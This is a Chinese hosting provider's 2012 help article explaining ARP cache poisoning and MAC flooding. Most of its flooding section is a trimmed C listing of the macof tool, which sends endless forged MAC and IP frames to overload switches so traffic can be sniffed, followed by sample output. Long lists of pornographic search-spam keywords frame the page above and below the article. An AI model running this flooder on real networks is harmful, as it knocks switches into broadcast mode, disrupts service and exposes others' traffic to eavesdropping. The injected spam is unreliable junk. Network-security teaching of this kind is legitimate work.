精品日韩在线,日韩精品福利一区二区三区,日韩午夜黄色,国产日韩欧美高清免费

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

戰術攻防之近距離搏擊篇(ARP)攻擊(2)

發布時間:  2012/7/5 10:09:04
 二、 攻擊分類

◆ARP緩存中毒

這是個非常有意思的標題—“中毒”,這能讓我聯想到霉綠色的空氣和腐銹的紅色河水,畢竟地球區域生態環境令人擔心?。

ARP緩存中毒其實質并沒有字面含義那么可怕。還記得前面所提高過ARP緩存表的概念吧,事實上每個網絡設備都有一個APR表,其中臨時記錄著匹配的設備MAC和IP地址映射對。它保證這些記錄具有唯一性,即一個IP只單獨映射一個MAC。又由于ARP本身不具備認證信任機制,因此欺騙行為變的泛濫。當網絡設備發送ARP REQUEST時,它完全相信ARP REPLY回應是來自于正確設備,因為它不能驗證回應數據包是否確切從正確的設備發送的。更糟糕的是,許多操作系統并不需要發送ARP請求數據包就直接承認其他設備發送的ARP回應數據包。

這樣垃圾方式的設計讓入侵變的肆意,而防御卻無奈了許多。假設我是一個黑帽,我知道ARP并無驗證行為,而且系統不需要發送請求數據包就可接收ARP的回應數據包。我會怎么做?創建一個貌似合法的ARP REPLY數據包,其中偽造我所希望的MAC和IP地址,并發送給盲目接收此類數據包的主機系統。結果,這種方式欺騙主機使其更新我所希望的MAC-IP地址映射對。當然,我可以肆意廣播這種ARP REPLY數據包,愚弄整個網絡系統所有主機(?冷)。

現在你知道了ARP的一個小技巧,我們稱其為:ARP緩存中毒。正是通過它,無數的發明創造出來,正如輪子的發明可以和人類登月媲美,簡單的發明可以翹動地球。

◆MAC泛洪攻擊(Flooding)

現在的網絡結構大多數使用交換方式(Switched)結構取代早先的的廣播方式(Broadcast),這樣的優勢在于交換機不會向每個端口無聊的推送廣播風暴,它稍微智能的判斷需要推送數據的端口,這讓那些層在HUB方式連接的下大顯神威的嗅探器(snffer)感到憋足。

然而進步的力量有時候令“安全”變的很嬌嫩。交換機啟用端口安全特性(Port security)需要消耗部分的CPU,當交換處理超負載后,交換機就無法處理端口安全,此時交換機陷入了HUB模式,數據被簡單的廣播到網絡中的每臺計算機中,于是竊聽活動仍然可以繼續。于是利用大量的偽造ARP REQUEST數據包對交換機的ARP表進行泛洪攻擊(ARP緩存表中毒的典型運用),可以輕易使很多廠商交換機負荷過載(CISCO 1900和3COM superstackII就容易遭受攻擊),此刻交換機處于類似HUB工作方式,因而可輕松使用包嗅探器刺探整個網絡。

macof的小程序輕松了實現了這樣的功能,其代碼實現如下:
---------------snip-------------------
#include "config.h"
#include 
#include 
#include 
#include 
#include 
#include 
#include

#include "version.h"

extern char *ether_ntoa(struct ether_addr *);
extern struct ether_addr *ether_aton(char *);

in_addr_t Src = 0;
in_addr_t Dst = 0;
u_char *Tha = NULL;
u_short Dport = 0;
u_short Sport = 0;
char   *Intf = NULL;
int Repeat = -1;  //導致偽造MAC的無限循環

void usage(void) {
fprintf(stderr, "Version: " VERSION "\n"
"Usage: macof ");
exit(1);
}
void gen_mac(u_char *mac) {
   //產生隨機MAC地址
*((in_addr_t *)mac) = libnet_get_prand(PRu32);
*((u_short *)(mac + 4)) = libnet_get_prand(PRu16);
}
int main(int argc, char *argv[]) {
int c, i;
struct libnet_link_int *llif;
char ebuf[PCAP_ERRBUF_SIZE];
u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN];
in_addr_t src, dst;
u_short sport, dport;
u_int32_t seq;
u_char pkt[ETH_H + IP_H + TCP_H];
if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL)
errx(1, "%s", ebuf);
if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0)
errx(1, "%s", ebuf);
libnet_seed_prand();
for (i = 0; i != Repeat; i++) {  
gen_mac(sha);
   gen_mac(tha);
   src = libnet_get_prand(PRu32);
dst = libnet_get_prand(PRu32);
sport = libnet_get_prand(PRu16);
dport = libnet_get_prand(PRu16);
seq = libnet_get_prand(PRu32);
//偽造貌似合法MAC地址
libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64,
  IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H);
libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
   0, NULL, 0, pkt + ETH_H + IP_H);
libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H);
libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H);
if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0)
 errx(1, "write");
fprintf(stderr, "%s ",
 "源MAC地址:"ether_ntoa((struct ether_addr *)sha));
fprintf(stderr, "%s\n %s:%d > %s:%d\n",
 "目標MAC地址:"ether_ntoa((struct ether_addr *)tha),
 "源IP地址/端口:"libnet_host_lookup(Src, 0), sport,
 "目標IP地址/端口:"libnet_host_lookup(Dst, 0), dport);
}
exit(0);
}
-----------------snip end-----------------------------

/* 本程序的作者是Dug Songdugsong@m.org,由于這里只需要實現MAC FLOODING的攻擊,所以我對程序做了精簡,便于讀者直觀了解MAC FLOODING的攻擊原理。另外,macof的最早作者是Ian Vitek,采用Perl進行編寫的*/

#macof 測試
[root@hackersvr /]# macof

源MAC地址:77:6b:e1:6e:5e:8c目標MAC地址:93:2d:ed:45:f9:e3

源IP地址/端口:0.0.0.0:45702目標IP地址/端口0.0.0.0:11000

源MAC地址:84:a4:d3:57:ef:8目標MAC地址:12:56:52:42:dc:95

源IP地址/端口:0.0.0.0:16630目標IP地址/端口0.0.0.0:3031

源MAC地址:f0:9:3f:18:89目標MAC地址:1d:86:53:53:d7:f8

源IP地址/端口:0.0.0.0:15535目標IP地址/端口0.0.0.0:7466 …………

此程序偽裝大量ARP回應數據包,導致交換機過載處理,因而陷入HUB方式處理數據包,Port Security特性失效。通過這種方式導致網絡安全再度陷入了竊聽的恐慌之中(注意:本程序只做實驗用途,嚴禁使用于任何工作環境,否則將導致網絡癱瘓或交換機硬件重置)。


本文出自:億恩科技【www.zuiquanben.com】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1-20183354
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 網絡版權侵權舉報電話:0371-60135995
  • 警情提示:注意防范電信網絡詐騙
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2026 ENKJ All Rights Reserved 地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師  B1-20183354   京公網安備41019702002023號 
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    精品日韩在线,日韩精品福利一区二区三区,日韩午夜黄色,国产日韩欧美高清免费
    在线天堂中文资源最新版| 日韩欧美一区二区三区在线观看| 国产精品1区在线| 国产乱人伦丫前精品视频| 精品一区二区三区四区五区| 国产高潮在线| 99成人在线| 亚洲精品国模| 成人一区不卡| 欧美午夜精彩| 天堂久久一区| 亚洲人成在线网站| 蜜臀av在线播放一区二区三区| 欧美亚洲一级| 欧美亚洲在线日韩| 亚洲乱码一区| 午夜精品成人av| 国产欧美自拍| 美女国产一区| 欧美日韩中文一区二区| 国产伊人精品| 亚洲专区欧美专区| 国产欧美日韩一区二区三区四区| 国产中文字幕一区二区三区| 黄色亚洲免费| 蜜桃精品视频| 亚洲精华国产欧美| 日韩不卡一区二区三区| 中文欧美日韩| 亚洲综合婷婷| 婷婷成人av| 亚洲日韩中文字幕一区| 91成人福利| 91tv亚洲精品香蕉国产一区| 视频一区中文字幕国产| 国产欧美另类| 另类中文字幕国产精品| 免费美女久久99| 青青草国产精品亚洲专区无| 亚洲1区在线观看| 久久一区亚洲| 免费一区二区三区在线视频| 日本三级亚洲精品| 欧美黄色一区| 黄色精品视频| 精品一区二区三区在线观看视频| 国产高清日韩| 日韩伦理福利| 国产精品igao视频网网址不卡日韩 | 欧美~级网站不卡| 日韩黄色在线观看| 久久中文亚洲字幕| 麻豆国产精品视频| 亚洲精品美女91| 久久精品二区三区| 欧美激情福利| 日韩国产在线观看| 日韩在线观看一区二区| 日韩深夜视频| 国产成人精品一区二区三区视频| 丝瓜av网站精品一区二区| 色婷婷色综合| 欧美激情视频一区二区三区免费| 久久亚洲色图| 性色一区二区| 国产精品毛片在线| 国产二区精品| 视频一区在线播放| 精品中文字幕一区二区三区四区| 久久激情五月婷婷| 免费不卡中文字幕在线| 香蕉精品视频在线观看| 日本欧美在线看| 国产亚洲人成a在线v网站| 日韩福利视频导航| 久久精品av麻豆的观看方式| 美女国产精品久久久| 成人福利视频| 国产精品日韩| 美女性感视频久久| 久久麻豆精品| 亚洲开心激情| 国产一区二区三区国产精品| sm捆绑调教国产免费网站在线观看 | 日韩专区欧美专区| 日韩va亚洲va欧美va久久| 久久av影视| 香蕉精品视频在线观看| 欧美日韩亚洲国产精品| 成人免费一区| 蜜臀av一区二区在线免费观看| 国产精品一区毛片| 免费精品国产的网站免费观看| 免费在线观看日韩欧美| 久久不卡国产精品一区二区| 青青久久av| 国产精品扒开腿做爽爽爽软件| 久久精品国内一区二区三区水蜜桃| 久久91导航| 国产中文在线播放| 婷婷激情一区| 午夜日韩影院| 99riav1国产精品视频| 亚洲成人不卡| 亚洲精品在线影院| 97欧美在线视频| 久久久久免费| 国产成人黄色| 国产成人精品一区二区三区视频| 国产精品成人3p一区二区三区| 日本电影久久久| 久久国际精品| 国产精品流白浆在线观看| 在线免费观看亚洲| 水野朝阳av一区二区三区| 老司机久久99久久精品播放免费| 国产精品手机在线播放| 红杏一区二区三区| 久久久久免费| 免费久久99精品国产自在现线| 亚州av日韩av| 日本亚洲最大的色成网站www | 色爱综合av| 日本免费久久| 福利一区二区免费视频 | 亚洲在线一区| 日韩一区二区三区四区五区| 综合一区二区三区| 婷婷亚洲成人| 国产精品99久久免费观看| 69堂精品视频在线播放| 国产精品三级| 视频在线不卡免费观看| 麻豆成人91精品二区三区| 精品理论电影在线| 久久91导航| 免费日韩视频| 国产精品探花在线观看| 精品国产乱码久久久| 欧美成人a交片免费看| 99精品视频精品精品视频| 欧美不卡高清| 色综合视频一区二区三区日韩 | 久久中文字幕av一区二区不卡| 国产亚洲一区二区手机在线观看| 国产精品88久久久久久| 亚洲永久字幕| 欧美+日本+国产+在线a∨观看| 国产一区二区三区国产精品| 国产日韩欧美高清免费| 国产一区二区三区四区五区 | 久久国产精品毛片| 麻豆国产精品视频| 日韩美女国产精品| 最新日韩av| 亚洲爱爱视频| 免费在线亚洲欧美| 日韩区一区二| 久久婷婷一区| 久久精品亚洲| 国产欧美日韩一级| 亚洲精选91| 亚洲综合日本| 亚洲二区在线| 精品日韩视频| 丰满少妇一区| 麻豆视频一区二区| 亚洲精品乱码久久久久久蜜桃麻豆 | 日韩一区二区三区免费| 久久三级毛片| 久久中文精品| 久久精品天堂| 日产午夜精品一线二线三线| 久久久国产精品入口麻豆| 欧美日本二区| 欧美激情aⅴ一区二区三区| 国产午夜精品一区在线观看| 日韩av一二三| 欧美日韩网址| 欧美国产另类| 最新中文字幕在线播放| 电影91久久久| 天堂日韩电影| 精品99久久| 波多野结衣久久精品| 激情综合网站| 亚洲在线久久| 国产欧美一区二区三区精品观看| 国产精品中文字幕制服诱惑| 国产精品www994| 神马久久午夜| 中文字幕av一区二区三区人| 日韩不卡一区二区三区| 国产极品嫩模在线观看91精品| 国产精品精品国产一区二区| 婷婷成人综合| 亚洲字幕久久| 久久中文欧美| 久久精品在线| 日本在线成人|